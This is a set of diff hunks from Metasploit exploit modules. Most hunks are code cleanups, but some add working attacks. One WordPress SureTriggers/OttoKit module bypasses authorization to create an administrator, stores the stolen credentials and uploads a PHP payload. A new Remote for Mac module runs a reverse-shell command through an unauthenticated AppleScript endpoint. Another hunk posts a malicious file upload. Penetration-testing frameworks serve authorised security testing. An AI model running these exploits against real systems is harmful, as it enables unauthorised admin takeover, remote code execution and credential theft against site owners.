+    png_data = Rex::Text.decode_base64('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==')
+    boundary = Rex::Text.rand_text_alphanumeric(8)
+
+    data = ''
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"_file[]\"; filename=\"#{payload_filename}\"\r\n"
+    data << "Content-Type: image/png\r\n\r\n"
+    data << png_data
+    data << "\r\n--#{boundary}--\r\n"
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "?_task=settings&_remote=1&_from=edit-!#{generate_from}&_id=#{generate_id}&_uploadid=#{generate_uploadid}&_action=upload"),
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => data
+    })
+
+    print_good('Exploit attempt complete. Check for session.')
+  end
+end
@@ -146,22 +146,6 @@ class MetasploitModule < Msf::Exploit::Remote
    nil
  end

-  # This function generates PHP code to execute a given payload on the target.
-  # We use Rex::RandomIdentifier::Generator to create a random variable name to avoid conflicts.
-  # The payload is encoded in base64 to prevent issues with special characters.
-  # The generated PHP code includes the necessary preamble and system block to execute the payload.
-  # This approach allows us to test multiple functions and not limit ourselves to potentially dangerous functions like 'system' which might be disabled.
-  def php_exec_cmd(encoded_payload)
-    vars = Rex::RandomIdentifier::Generator.new
-    dis = "$#{vars[:dis]}"
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    <<-END_OF_PHP_CODE
-              #{php_preamble(disabled_varname: dis)}
-              $c = base64_decode("#{encoded_clean_payload}");
-              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-  end
-
  def exploit
    form_data = get_form_data

@@ -97,18 +97,6 @@ class MetasploitModule < Msf::Exploit::Remote
    Exploit::CheckCode::Safe
  end

-  def php_exec_cmd(encoded_payload)
-    vars = Rex::RandomIdentifier::Generator.new
-    dis = '$' + vars[:dis]
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    shell = <<-END_OF_PHP_CODE
-        #{php_preamble(disabled_varname: dis)}
-        $c = base64_decode("#{encoded_clean_payload}");
-        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-    return shell
-  end
-
  def exploit
    uri = normalize_uri(target_uri.path, 'spip.php')
    print_status("#{rhost}:#{rport} - Attempting to exploit...")
@@ -105,17 +105,6 @@ class MetasploitModule < Msf::Exploit::Remote
    CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
  end

-  def php_exec_cmd(encoded_payload)
-    dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    shell = <<-END_OF_PHP_CODE
-        #{php_preamble(disabled_varname: dis)}
-        $c = base64_decode("#{encoded_clean_payload}");
-        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-    return shell
-  end
-
  def exploit
    print_status('Preparing to send exploit payload to the target...')
    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
@@ -112,18 +112,6 @@ class MetasploitModule < Msf::Exploit::Remote
    )
  end

-  def php_exec_cmd(encoded_payload)
-    vars = Rex::RandomIdentifier::Generator.new
-    dis = '$' + vars[:dis]
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    shell = <<-END_OF_PHP_CODE
-        #{php_preamble(disabled_varname: dis)}
-        $c = base64_decode("#{encoded_clean_payload}");
-        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-    return shell
-  end
-
  def exploit
    uri = normalize_uri(target_uri.path, 'spip.php?page=spip_pass&lang=fr')
    res = send_request_cgi({ 'uri' => uri })
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => ['php'],
       'Arch'           => ARCH_PHP,
       'Targets'        => [['Automatic', {}]],
-       'Privileged'     => 'true',
+       'Privileged'     => true,
       'DefaultTarget'  => 0,
       # The post2file.php vuln was reported in 2013 by Denis Andzakovic. And then on Aug 2015,
       # it was discovered again by Ewerson 'Crash' Guimaraes.
@@ -95,18 +95,6 @@ class MetasploitModule < Msf::Exploit::Remote
    CheckCode::Appears
  end

-  def php_exec_cmd(encoded_payload)
-    vars = Rex::RandomIdentifier::Generator.new
-    dis = '$' + vars[:dis]
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    shell = <<-END_OF_PHP_CODE
-        #{php_preamble(disabled_varname: dis)}
-        $c = base64_decode("#{encoded_clean_payload}");
-        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-    return shell
-  end
-
  def exploit
    print_status('Sending the payload, please wait...')

@@ -125,19 +125,6 @@ class MetasploitModule < Msf::Exploit::Remote
    nonce_match ? nonce_match[1] : nil
  end

-  def php_exec_cmd(encoded_payload)
-    dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-
-    shell = <<-END_OF_PHP_CODE
-      #{php_preamble(disabled_varname: dis)}
-      $c = base64_decode("#{encoded_clean_payload}");
-      #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-
-    return Rex::Text.compress(shell)
-  end
-
  def upload_php_file(nonce)
    file_content = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
    file_name = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote

  include Msf::Payload::Php
  include Msf::Auxiliary::Report
+  include Msf::Module::HasActions
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Wordpress
@@ -17,26 +18,30 @@ class MetasploitModule < Msf::Exploit::Remote
    super(
      update_info(
        info,
-        'Name' => 'WordPress SureTriggers Auth Bypass and RCE',
+        'Name' => 'WordPress SureTriggers (aka OttoKit) Combined Auth Bypass (CVE-2025-3102, CVE-2025-27007)',
        'Description' => %q{
-          This module exploits an authorization bypass in the WordPress SureTriggers plugin (<= 1.0.78).
-          It first creates a new administrator account via the unauthenticated REST endpoint,
-          then uploads and executes a PHP payload using FileDropper for remote code execution.
+          Exploits two distinct authorization bypasses in SureTriggers/OttoKit plugin:
+          - CVE-2025-3102: admin creation via St-Authorization Bearer (empty)
+          - CVE-2025-27007: reset access key via connection endpoint & admin creation with Bearer header
        },
        'Author' => [
-          'Michael Mazzolini (mikemyers)', # Vulnerability Discovery
-          'Khaled Alenazi (Nxploited)',    # PoC
-          'Valentin Lobstein'              # Metasploit module
+          'Michael Mazzolini (mikemyers)',  # Vulnerability discovery (CVE-2025-3102)
+          'Denver Jackson',                 # Vulnerability discovery (CVE-2025-27007)
+          'Khaled Alenazi (Nxploited)',     # PoC (CVE-2025-3102)
+          'Valentin Lobstein',              # Metasploit module
        ],
        'References' => [
          ['CVE', '2025-3102'],
+          ['CVE', '2025-27007'],
          ['URL', 'https://github.com/Nxploited/CVE-2025-3102'],
-          ['URL', 'https://www.wordfence.com/blog/2025/04/100000-wordpress-sites-affected-by-administrative-user-creation-vulnerability-in-suretriggers-wordpress-plugin/']
+          ['URL', 'https://www.wordfence.com/blog/2025/04/100000-wordpress-sites-affected-by-administrative-user-creation-vulnerability-in-suretriggers-wordpress-plugin/'],
+          ['URL', 'https://patchstack.com/articles/additional-critical-ottokit-formerly-suretriggers-vulnerability-patched?_s_id=cve'],
+          ['URL', 'https://cloud.projectdiscovery.io/library/CVE-2025-27007']
        ],
        'License' => MSF_LICENSE,
-        'Privileged' => false,
        'Platform' => %w[unix linux win php],
        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Privileged' => false,
        'Targets' => [
          [
            'PHP In-Memory',
@@ -64,20 +69,25 @@ class MetasploitModule < Msf::Exploit::Remote
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2025-03-13',
+        'Actions' => [
+          ['CVE-2025-3102', { 'Description' => 'SureTriggers <= 1.0.78 auth bypass & RCE' }],
+          ['CVE-2025-27007', { 'Description' => 'SureTriggers <= 1.0.82 auth bypass, reset & RCE' }]
+        ],
+        'DefaultAction' => 'CVE-2025-27007',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
-      )
+    )

    register_options(
      [
-        OptString.new('WP_USER', [true, 'Username for the new administrator', Faker::Internet.username(specifier: 5..8)]),
-        OptString.new('WP_PASS', [true, 'Password for the new administrator', Faker::Internet.password(min_length: 12)]),
-        OptString.new('WP_EMAIL', [true, 'Email for the new administrator', Faker::Internet.email(name: Faker::Internet.username(specifier: 5..8))]),
-        OptString.new('ST_AUTH', [false, 'Value for st_authorization header', ''])
+        OptString.new('WP_USER', [ true, 'Username for the new administrator', Faker::Internet.username(specifier: 5..8) ]),
+        OptString.new('WP_PASS', [ true, 'Password for the new administrator', Faker::Internet.password(min_length: 12) ]),
+        OptString.new('WP_EMAIL', [ true, 'Email for the new administrator', Faker::Internet.email(name: Faker::Internet.username(specifier: 5..8)) ]),
+        OptString.new('ST_AUTH', [ false, 'Value for st_authorization header', Rex::Text.rand_text_alphanumeric(16)])
      ]
    )
  end
@@ -89,103 +99,101 @@ class MetasploitModule < Msf::Exploit::Remote
    print_status("Detected WordPress version: #{wp_version}") if wp_version

    plugin = 'suretriggers'
-    readme = check_plugin_version_from_readme(plugin, '1.0.79', '0.0.1')
-    detected = readme&.details&.dig(:version)
+    max_versions = {
+      'cve-2025-3102' => '1.0.78',
+      'cve-2025-27007' => '1.0.82'
+    }
+    max_vuln = max_versions[action.name.downcase]

-    if detected.nil?
-      return CheckCode::Unknown("Unable to determine the #{plugin} plugin version.")
+    detected = check_plugin_version_from_readme(plugin)&.details&.dig(:version)
+    return CheckCode::Unknown("Unable to determine #{plugin} version") unless detected
+
+    @plugin_version = detected
+
+    ver = Rex::Version.new(detected)
+    if ver <= Rex::Version.new(max_vuln)
+      CheckCode::Appears("Detected #{plugin} #{ver} vulnerable to #{action.name}")
+    else
+      CheckCode::Safe("Detected #{plugin} #{ver} appears patched")
    end
-
-    detected_version = Rex::Version.new(detected)
-
-    if detected_version <= Rex::Version.new('1.0.78')
-      return CheckCode::Appears("Detected #{plugin} version #{detected_version}")
-    end
-
-    CheckCode::Safe("#{plugin} #{detected_version} >= 1.0.79 appears patched")
  end

  def exploit
-    print_status('Attempting to create administrator user via auth bypass...')
+    token = ''
+    if action.name.downcase == 'cve-2025-27007'
+      reset_access_key
+      token = datastore['ST_AUTH']
+    end

-    create_uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'automation', 'action')
-    headers = { 'st_authorization' => datastore['ST_AUTH'] }
-    payload = user_payload.to_json
+    headers = { 'St-Authorization' => "Bearer #{token}" }
+    res = create_admin_request(headers)
+    unless res&.code == 200 && res.get_json_document&.dig('success')
+      fail_with(Failure::UnexpectedReply, "#{action.name}: user creation failed")
+    end

+    finalize_admin
+    cookie = wordpress_login(datastore['WP_USER'], datastore['WP_PASS'])
+    upload_and_execute_payload(cookie)
+  end
+
+  # Sends a JSON POST to wp-json/<segments>, then retries via rest_route without wp-json
+  def send_json_with_fallback(segments, payload, headers)
+    # Primary path
+    uri = normalize_uri(target_uri.path, 'wp-json', *segments)
    res = send_request_cgi(
      'method' => 'POST',
-      'uri' => create_uri,
+      'uri' => uri,
      'ctype' => 'application/json',
      'data' => payload,
      'headers' => headers
    )
-
+    # Fallback
    unless res&.code == 200 && res.get_json_document&.dig('success')
-      print_warning('Primary endpoint failed, trying fallback via rest_route...')
+      vprint_warning('Primary endpoint failed, trying fallback via rest_route...')
      res = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path),
-        'vars_get' => { 'rest_route' => '/sure-triggers/v1/automation/action' },
+        'vars_get' => { 'rest_route' => "/#{segments.join('/')}" },
        'ctype' => 'application/json',
        'data' => payload,
        'headers' => headers
      )
    end
+    res
+  end

-    unless res&.code == 200 && res.get_json_document&.dig('success')
-      fail_with(Failure::UnexpectedReply, 'User creation did not return success')
-    end
+  def create_admin_request(headers)
+    send_json_with_fallback(
+      ['sure-triggers', 'v1', 'automation', 'action'],
+      user_payload.to_json,
+      headers
+    )
+  end

-    print_good("Administrator created: #{datastore['WP_USER']}:#{datastore['WP_PASS']}")
+  def user_agent_header
+    return 'SureTriggers' unless @plugin_version

-    create_credential(
-      workspace_id: myworkspace_id,
-      origin_type: :service,
-      module_fullname: fullname,
-      username: datastore['WP_USER'],
-      private_type: :password,
-      private_data: datastore['WP_PASS'],
-      service_name: 'WordPress',
-      address: datastore['RHOST'],
-      port: datastore['RPORT'],
-      protocol: 'tcp',
-      status: Metasploit::Model::Login::Status::UNTRIED
+    @plugin_version < Rex::Version.new('1.0.81') ? 'SureTriggers' : 'OttoKit'
+  end
+
+  def reset_access_key
+    print_status('Resetting access key')
+    body = {
+      'sure-triggers-access-key' => datastore['ST_AUTH'],
+      'wp-password' => datastore['WP_PASS'],
+      'connection_status' => 'ok',
+      'wp-username' => datastore['WP_USER'],
+      'connected_email' => datastore['WP_EMAIL']
+    }.to_json
+
+    res = send_json_with_fallback(
+      ['sure-triggers', 'v1', 'connection', 'create-wp-connection'],
+      body,
+      { 'User-Agent' => user_agent_header }
    )

-    vprint_good("Credential for user '#{datastore['WP_USER']}' stored successfully.")
-
-    loot_data = "Username: #{datastore['WP_USER']}, Password: #{datastore['WP_PASS']}\n"
-    loot_path = store_loot(
-      'wordpress.admin.created',
-      'text/plain',
-      datastore['RHOST'],
-      loot_data,
-      'wp_admin_credentials.txt',
-      'WordPress Created Admin Credentials'
-    )
-    vprint_good("Loot saved to: #{loot_path}")
-
-    report_host(host: datastore['RHOST'])
-
-    report_service(
-      host: datastore['RHOST'],
-      port: datastore['RPORT'],
-      proto: 'tcp',
-      name: fullname,
-      info: 'WordPress with vulnerable SureTriggers plugin allowing unauthenticated admin creation'
-    )
-
-    report_vuln(
-      host: datastore['RHOST'],
-      port: datastore['RPORT'],
-      proto: 'tcp',
-      name: 'SureTriggers WordPress Plugin Auth Bypass',
-      refs: references,
-      info: 'Unauthenticated admin creation via vulnerable REST API endpoint'
-    )
-
-    cookie = wordpress_login(datastore['WP_USER'], datastore['WP_PASS'])
-    upload_and_execute_payload(cookie)
+    fail_with(Failure::UnexpectedReply, 'Key reset failed') unless res&.code == 200 && res.get_json_document&.dig('success')
+    print_good('Access key reset successful')
  end

  def user_payload
@@ -203,6 +211,57 @@ class MetasploitModule < Msf::Exploit::Remote
    }
  end

+  def finalize_admin
+    print_good("Admin created: #{datastore['WP_USER']}:#{datastore['WP_PASS']}")
+
+    create_credential(
+      workspace_id: myworkspace_id,
+      origin_type: :service,
+      module_fullname: fullname,
+      username: datastore['WP_USER'],
+      private_type: :password,
+      private_data: datastore['WP_PASS'],
+      service_name: 'WordPress',
+      address: datastore['RHOST'],
+      port: datastore['RPORT'],
+      protocol: 'tcp',
+      status: Metasploit::Model::Login::Status::UNTRIED
+    )
+    vprint_good("Credential for user '#{datastore['WP_USER']}' stored successfully.")
+
+    report_host(host: datastore['RHOST'])
+
+    service = report_service(
+      host: datastore['RHOST'],
+      port: datastore['RPORT'],
+      proto: 'tcp',
+      name: fullname,
+      info: 'WordPress with vulnerable SureTriggers plugin allowing unauthenticated admin creation'
+    )
+
+    loot_data = "Username: #{datastore['WP_USER']}, Password: #{datastore['WP_PASS']}\n"
+    loot_path = store_loot(
+      'wordpress.admin.created',
+      'text/plain',
+      datastore['RHOST'],
+      loot_data,
+      'wp_admin_credentials.txt',
+      'WordPress Created Admin Credentials',
+      service
+    )
+    vprint_good("Loot saved to: #{loot_path}")
+
+    report_vuln(
+      host: datastore['RHOST'],
+      port: datastore['RPORT'],
+      proto: 'tcp',
+      service: service,
+      name: "SureTriggers Auth Bypass (#{action.name})",
+      refs: references,
+      info: 'Unauthenticated admin creation via SureTriggers plugin'
+    )
+  end
+
  def upload_and_execute_payload(auth_cookie)
    plugin = "wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
    payload_name = "ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}.php"
@@ -74,18 +74,6 @@ class MetasploitModule < Msf::Exploit::Remote
    )
  end

-  def php_exec_cmd(encoded_payload)
-    dis = '$' + Rex::RandomIdentifier::Generator.new.generate
-    b64_encoded_payload = Rex::Text.encode_base64(encoded_payload)
-    shell = <<-END_OF_PHP_CODE
-    #{php_preamble(disabled_varname: dis)}
-    $cmd = base64_decode("#{b64_encoded_payload}");
-    #{php_system_block(cmd_varname: '$cmd', disabled_varname: dis)}
-    END_OF_PHP_CODE
-
-    return Rex::Text.compress(shell)
-  end
-
  def check
    return CheckCode::Unknown('The WordPress site does not appear to be online.') unless wordpress_and_online?

@@ -0,0 +1,106 @@
+require 'json'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Remote for Mac Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution vulnerability in
+          Remote for Mac versions up to and including 2025.7 via the /api/executeScript endpoint.
+          When authentication is disabled on the target system, it allows attackers to execute
+          arbitrary AppleScript commands, which can include shell commands via `do shell script`.
+          All versions up to 2025.7 (including patch versions) are vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Chokri Hammedi (@blue0x1)'],
+        'References' => [
+          ['PACKETSTORM', '195347']
+        ],
+        'DisclosureDate' => '2025-05-27',
+        'Platform' => ['unix', 'osx'],
+        'Arch' => ARCH_CMD,
+        'Targets' => [['Auto', {}]],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'api', 'getVersion'),
+      'method' => 'GET'
+    )
+
+    return CheckCode::Unknown('No response from target') unless res&.code == 200
+
+    info = res.get_json_document
+
+    if info.empty?
+      return CheckCode::Unknown('Unable to parse JSON from /api/getVersion')
+    end
+
+    if info['requires.auth'] == true
+      return CheckCode::Safe('Target requires authentication on /api/executeScript')
+    end
+
+    version = info['version'].to_s
+    if version.empty?
+      return CheckCode::Unknown('Could not determine target version')
+    end
+
+    target_version = Rex::Version.new(version)
+    vulnerable_version = Rex::Version.new('2025.7')
+
+    if target_version <= vulnerable_version
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe("Target version #{version} is not vulnerable")
+    end
+  end
+
+  def exploit
+    print_status("Generating reverse shell payload for #{datastore['LHOST']}:#{datastore['LPORT']}")
+    cmd = payload.encoded
+    applescript = %(do shell script "#{cmd}")
+
+    host_name = Rex::Text.rand_text_alpha(8)
+    host_model = "#{Rex::Text.rand_text_alpha(4)}#{rand(99)}"
+    script_name = Rex::Text.rand_text_alpha(8)
+
+    print_status("Sending exploit to #{rhost}:#{rport} via AppleScript")
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'api', 'executeScript'),
+      'method' => 'GET',
+      'headers' => {
+        'X-ClientToken' => Rex::Text.rand_text_numeric(4),
+        'X-HostName' => host_name,
+        'X-HostFullModel' => host_model,
+        'X-Script' => applescript,
+        'X-ScriptName' => script_name,
+        'X-ScriptDelay' => '0'
+      }
+    )
+
+    print_status('Payload sent')
+    if res&.code == 200
+      print_good('Payload delivered successfully. Awaiting session...')
+      res_json = res.get_json_document
+      print_status("Received response: #{res_json['result']}")
+    end
+  end
+end
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
          ],
        'License'        => MSF_LICENSE,
        'Platform'       => 'php',
-        'Privileged'     => 'true',
+        'Privileged'     => true,
        'DefaultOptions' =>
          {
            'SSL'     => true,
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'StackAdjustment' => -3500,
          'PrependEncoder'  => "\x81\xc4\x54\xf2\xff\xff",
          'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
-          'DisableNops'  =>  'True',
+          'DisableNops'  => true
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-          'DisableNops'   =>  'True',
+          'DisableNops'   => true,
        },
      'Platform' => 'win',
      'Targets'        =>
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Space'          => 750,
          'BadChars'       => "",  #Memcpy
          'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,
-          'DisableNops'    =>  'True',
+          'DisableNops'    => true,
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'EncoderOptions' =>
            {
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-          'DisableNops'   =>  'True',
+          'DisableNops'   => true,
        },
      'Platform' => 'win',
      'Targets'        =>
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
        {
          'Space' => 0x1000,
          'BadChars' => "\x00\x0d\x0a\x1a\x2c\x2e\x3a\x5c", # \x00\r\n\x1a,.:\\
-          'DisableNops' => 'True',
+          'DisableNops' => true,
          'StackAdjustment' => -3500,
        },
      'Platform'		=> 'win',
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Space' => 650,
          'BadChars' => "\x00\x0a\x1a\x2c\xff",
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500
-          'DisableNops' => 'True'
+          'DisableNops' => true
        },
      'Platform' => 'win',
      'Targets' =>
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
        {
          'Space' => 4720,
          'BadChars' => "\x00\x20\x0a\x0d",
-          'DisableNops' => 'True',
+          'DisableNops' => true
        },
      'Platform' => 'win',
      'Targets' =>
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Payload'        =>
        {
          'Space'    => 1024,
-          'DisableNops'   =>  'True',
+          'DisableNops' => true,
          'BadChars' => "\x00\x2c\x5c",
          'StackAdjustment' => -3500,
        },
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
        {
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
-          'DisableNops' => 'True',
+          'DisableNops' => true
        },
      'Platform' => 'win',
      'Targets'        =>
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Payload'        =>
        {
          'Space'    => 4108,
-          'DisableNops'   	=>  'True',
+          'DisableNops' => true,
          # input restriction: UTF-8!
          'BadChars' 			=> [0,0x0a,0x0d,*(0x80..0xcf)].pack("C*"),
          'EncoderType' 		=> Msf::Encoder::Type::AlphanumMixed,
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Payload'        =>
        {
          'Space'       => 8000,  #could be more, but this is enough
-          'DisableNops' =>  'True',
+          'DisableNops' => true,
          'BadChars'    => "\x00\x0a\x0d",
        },
      'Platform' => 'win',
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
        {
          'Space' => 1500,
          'BadChars' => "\x00\x09\x0a",
-          'DisableNops' => 'True',
+          'DisableNops' => true,
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Payload'        =>
        {
          'Space'       => 2339,  #about 0x900 bytes
-          'DisableNops' => 'True',
+          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Payload'        =>
        {
          'Space'       => 2339,  #about 0x900 bytes
-          'DisableNops' => 'True',
+          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Space'    => 650,
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
-          'DisableNops'   =>  'True',
+          'DisableNops' => true
        },
      'Platform' => 'win',
      'Targets'        =>
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-          'DisableNops'   =>  'True',
+          'DisableNops' => true
        },
      'Platform' => 'win',
      'Targets'        =>
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
        {
          'Space'        => 800,  #0x320 bytes - avoid marking wrong page as RWX
          'BadChars'     => "\x00\x0a\x0b\x0c\x0d\x0e\x0f\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x26\x27\x2f\x3c\x3e",
-          'DisableNops'  => 'True',
+          'DisableNops' => true
        },
      'Platform' => 'win',
      'Targets'  =>
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Space'    => 750,
          'BadChars' => "\x00",
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-          'DisableNops'  =>  'True',
+          'DisableNops' => true
        },
      'Platform' => 'win',
      'Targets'        =>
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Space'    => 750,
          'BadChars' => "\x00",
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-          'DisableNops'  =>  'True',
+          'DisableNops' => true
        },
      'Platform' => 'win',
      'Targets'        =>
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
        {
          'BadChars'    => "\xff",
          'Space'       => 600,
-          'DisableNops' => 'True',
+          'DisableNops' => true,
          'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200
        },
      'Platform'       => 'win',
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Payload'        =>
        {
          'Space'       => 936,
-          'DisableNops' => 'True',
+          'DisableNops' => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Space'            => 1000,
          'BadChars'         => "\x00\x0a\x0d",
          'StackAdjustment'  => -3500,
-          'DisableNops'      => 'True'
+          'DisableNops'      => true
        },
      'Targets'       =>
        [
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
          # format string max length
          'Space'    => 1024,
          'BadChars' => "\x00\x0a\x0d\x25",
-          'DisableNops'	=>  'True',
+          'DisableNops'	=> true,
          'StackAdjustment' 	=> -1500
        },
      'Platform'       => 'win',
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
        {
          'BadChars' => "\x00",
          'StackAdjustment' => -1500,
-          'DisableNops' => 'True',
+          'DisableNops' => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
          # format string max length
          'Space'    => 1024,
          'BadChars' => "\x00\x08\x0a\x0d\x2c\xff",
-          'DisableNops'	=>  'True'
+          'DisableNops'	=> true
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
          #'Space'			=> 600,
          'BadChars' 		=> "\x00\x0a\x0d\x20%=?\x2f\x5c\x3a\x3d\@;!$",
          'EncoderType'		=> Msf::Encoder::Type::AlphanumMixed,
-          'DisableNops'  		=>  'True',
+          'DisableNops'  		=> true,
          'StackAdjustment' 	=> -3500,
        },
      'Platform' => ['win'],
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'BadChars' => "\x00\x0a\x0d\x20",
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
          'StackAdjustment' => -3500,
-          'DisableNops'  =>  'True',
+          'DisableNops'  => true,
        },
      'Targets'        =>
        [
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'BadChars' => "\x00\x0a\x0b\x0d\x20\x23\x25\x26\x2b\x2f\x3a\x3c\x3d\x3f\x5c",
          'StackAdjustment' => -3500,
          #'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-          'DisableNops'	=>  'True',
+          'DisableNops'	=> true,
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
-          'DisableNops'  =>  'True',
+          'DisableNops'  => true,
        },
      'Platform'       => 'win',
      'Targets'        =>
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
          'Space'    => 750,
          'BadChars' => "\x00",
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
-          'DisableNops' => 'True',
+          'DisableNops' => true,
          'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
          'EncoderOptions' =>
            {
